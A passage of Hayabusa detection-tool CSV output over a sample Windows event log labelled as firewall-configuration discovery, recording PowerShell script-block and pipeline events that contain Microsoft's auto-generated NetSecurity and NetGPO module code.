[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetGPO ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 